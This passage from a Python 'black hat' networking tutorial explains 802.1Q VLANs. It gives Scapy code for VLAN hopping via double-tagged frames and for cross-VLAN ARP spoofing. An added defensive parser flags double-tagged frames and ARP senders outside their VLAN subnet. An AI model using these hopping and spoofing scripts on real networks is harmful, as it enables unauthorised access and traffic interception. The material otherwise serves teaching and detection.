A VLAN (virtual local area network) is a logical network built on top of Ethernet switching technology. It can divide one physical network into several VLANs, and it can also span physical boundaries, placing users on different physical segments into the same VLAN. Figure 2 shows an example of VLAN partitioning.
Figure 2
There are many ways to implement VLANs. Based on how the switching devices divide them, there are generally two kinds:
• Port-based partitioning on the switch
• An extended Ethernet frame format based on the IEEE 802.1Q protocol
Layer-2 VLAN technology also introduces the concept of trunking: a trunk connects different switches so that members of the same VLAN spread across several switches can communicate with each other. The ports used to interconnect switches are called trunk ports. In addition to 802.1Q, Cisco has its own trunking protocol called ISL.
Figure 3
Figure 3 shows an 802.1Q frame. There is no essential difference from an ordinary Ethernet frame; a VLAN tag is simply inserted. The VLAN identifier (the red part) records which VLAN the frame belongs to, which is what keeps broadcast traffic from crossing VLAN boundaries.
Now a simple thought: to communicate across VLANs, is it enough to just modify that identifier in the packet?
3.4.1 VLAN Hopping
Based on the above analysis, consider a simple scenario: a cross-VLAN ping, sending an ICMP echo request from a host in VLAN 1 to a host in VLAN 2.
Before coding, we have to solve the problem of constructing VLAN packets. In Scapy, the Dot1Q class builds the tag portion shown in Figure 3, as shown in Figure 4.
Figure 4
Now we can write a cross-VLAN ping request.
#!/usr/bin/python
from scapy.all import Ether, Dot1Q, IP, ICMP, sendp

# Double-tagged ICMP echo request: the outer tag is the VLAN we send from,
# the inner tag is the VLAN of the target host (see Figure 3 for the tag layout).
packet = Ether(dst="c0:d3:de:ad:be:ef")/\
         Dot1Q(vlan=1)/\
         Dot1Q(vlan=2)/\
         IP(dst="192.168.13.3")/\
         ICMP()
sendp(packet)
The code above specifies the target host's MAC and IP addresses and adds two VLAN tags: the first is the VLAN the packet is sent from, and the second is the VLAN where the target host resides. The switch strips the first tag and, when it reads the second tag, forwards the packet to the target host.
3.4.2 Cross-VLAN ARP spoofing
Sections 3.1, 3.2 and 3.3 all discussed ARP spoofing. Because a VLAN limits the broadcast domain, our earlier code cannot perform ARP spoofing across VLANs. This is easy to solve, however, by inserting the VLAN IDs into the ARP packets we constructed earlier. The following is the code from section 3.1 that constructs the ARP request packet.
import sys
from scapy.all import Ether, ARP, getmacbyip

# options, args and mac come from the option parsing in section 3.1:
# args[0] is the IP address being claimed, options.target the host to send to.
def build_req():
    if options.target is None:
        # No specific target: broadcast the request to the whole segment
        pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=mac, psrc=args[0], pdst=args[0])
    elif options.target:
        target_mac = getmacbyip(options.target)
        if target_mac is None:
            print("[-] Error: could not resolve target's MAC address")
            sys.exit(1)
        pkt = Ether(src=mac, dst=target_mac)/ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
    return pkt
In the part that constructs the packet, we insert the two VLAN tags (our_vlan is the VLAN we send from, target_vlan the VLAN of the target):
pkt = Ether(src=mac, dst=target_mac)/Dot1Q(vlan=our_vlan)/Dot1Q(vlan=target_vlan)/ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
This enables ARP spoofing across VLANs.
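As an added example that is not part of the original article, here is the defender's-side complement to 3.4.1 and 3.4.2: a small pure-Python parser that walks the 802.1Q tag stack of Figure 3 and reports frames that carry two tags (the double tagging used above) or ARP requests whose sender address does not belong to the VLAN that the innermost tag delivers them into. The VLAN-to-subnet mapping, the MAC addresses and the sample frames are constructed for this example; the parser itself follows the IEEE 802.1Q tag layout (TPID 0x8100 followed by a 16-bit TCI whose low 12 bits are the VLAN ID) and also accepts the 802.1ad TPID 0x88A8. It needs Python 3 and no Scapy.

```python
import struct
import ipaddress

TPID_8021Q = 0x8100    # Tag Protocol Identifier of an 802.1Q tag (the tag in Figure 3)
TPID_8021AD = 0x88A8   # IEEE 802.1ad service tag; treated as a VLAN tag as well
ETHERTYPE_IPV4 = 0x0800
ETHERTYPE_ARP = 0x0806

# Which IPv4 subnet each VLAN is supposed to carry. Constructed for this example;
# a real deployment would load this mapping from its IPAM or switch configuration.
VLAN_SUBNETS = {
    1: ipaddress.ip_network("192.168.1.0/24"),
    2: ipaddress.ip_network("192.168.13.0/24"),
}


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_frame(dst_mac, src_mac, vlans, ethertype, payload):
    """Constructed sample frame: Ethernet header, zero or more 802.1Q tags, payload."""
    frame = mac_bytes(dst_mac) + mac_bytes(src_mac)
    for vid in vlans:
        frame += struct.pack("!HH", TPID_8021Q, vid & 0x0FFF)  # PCP=0, DEI=0, VID=vid
    return frame + struct.pack("!H", ethertype) + payload


def build_arp_request(sender_mac, sender_ip, target_ip):
    """Constructed ARP who-has payload: HTYPE=1, PTYPE=IPv4, HLEN=6, PLEN=4, OPER=1."""
    return (struct.pack("!HHBBH", 1, ETHERTYPE_IPV4, 6, 4, 1)
            + mac_bytes(sender_mac) + ipaddress.ip_address(sender_ip).packed
            + b"\x00" * 6 + ipaddress.ip_address(target_ip).packed)


def parse_frame(raw):
    """Return (dst_mac, src_mac, [VLAN IDs outer->inner], ethertype, payload)."""
    if len(raw) < 14:
        raise ValueError("frame too short for an Ethernet header")
    dst, src = mac_str(raw[0:6]), mac_str(raw[6:12])
    offset = 12
    vlans = []
    ethertype = struct.unpack("!H", raw[offset:offset + 2])[0]
    # Each tag is TPID (2 bytes) + TCI (2 bytes: PCP 3 bits, DEI 1 bit, VID 12 bits).
    # Keep peeling tags while the next two bytes are still a TPID.
    while ethertype in (TPID_8021Q, TPID_8021AD):
        if len(raw) < offset + 6:
            raise ValueError("truncated VLAN tag")
        tci = struct.unpack("!H", raw[offset + 2:offset + 4])[0]
        vlans.append(tci & 0x0FFF)
        offset += 4
        ethertype = struct.unpack("!H", raw[offset:offset + 2])[0]
    return dst, src, vlans, ethertype, raw[offset + 2:]


def arp_sender_ip(payload):
    """Sender protocol address (SPA) of an Ethernet/IPv4 ARP payload."""
    if len(payload) < 28:
        raise ValueError("truncated ARP payload")
    return ipaddress.ip_address(payload[14:18])


def classify_frame(raw):
    """Return a list of findings for one frame; an empty list means nothing odd."""
    dst, src, vlans, ethertype, payload = parse_frame(raw)
    findings = []
    # Two tags on a frame seen on an access port is the signature of the
    # double-tagging trick described in 3.4.1.
    if len(vlans) >= 2:
        findings.append("double-tagged frame (outer VLAN %d, inner VLAN %d)" % (vlans[0], vlans[1]))
    # For ARP, the innermost tag is the VLAN the frame is delivered into; the sender
    # address should belong to that VLAN's subnet (catches the 3.4.2 variant).
    if ethertype == ETHERTYPE_ARP and vlans:
        sender, vlan = arp_sender_ip(payload), vlans[-1]
        net = VLAN_SUBNETS.get(vlan)
        if net is not None and sender not in net:
            findings.append("ARP sender %s is not in VLAN %d (%s)" % (sender, vlan, net))
    return findings


# Constructed samples: the article's double-tagged echo request (outer VLAN 1, inner
# VLAN 2), a double-tagged ARP request with a VLAN 1 sender delivered into VLAN 2,
# and a normal single-tagged ARP request for comparison.
SAMPLE_PING = build_frame("c0:d3:de:ad:be:ef", "00:11:22:33:44:55", [1, 2],
                          ETHERTYPE_IPV4, b"\x45" + b"\x00" * 19)
SAMPLE_ARP = build_frame("c0:d3:de:ad:be:ef", "00:11:22:33:44:55", [1, 2], ETHERTYPE_ARP,
                         build_arp_request("00:11:22:33:44:55", "192.168.1.1", "192.168.13.3"))
SAMPLE_NORMAL = build_frame("c0:d3:de:ad:be:ef", "00:11:22:33:44:55", [2], ETHERTYPE_ARP,
                            build_arp_request("00:11:22:33:44:55", "192.168.13.1", "192.168.13.3"))

if __name__ == "__main__":
    for name, frame in (("ping", SAMPLE_PING), ("arp", SAMPLE_ARP), ("normal", SAMPLE_NORMAL)):
        print(name, classify_frame(frame) or ["ok"])
```

Feed it raw frames captured on access ports: a correctly configured access port should never carry a frame with two tags, so any double-tag hit from classify_frame is worth an alert, while the ARP check is only as good as the VLAN_SUBNETS table it is given.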
3.4.3 Summary
This section mainly discussed how to construct tagged VLAN packets to achieve cross-VLAN communication and ARP spoofing. Note that the approach in this article targets the 802.1Q protocol; it has no effect on VLANs that are isolated physically by port.
That concludes this introduction to section 3.4 of Python Black Hat Programming, on crossing VLANs. I hope it helps; if you have any questions, leave a message and the editor will reply promptly. Thanks also to the Cloud Habitat Community website for its support!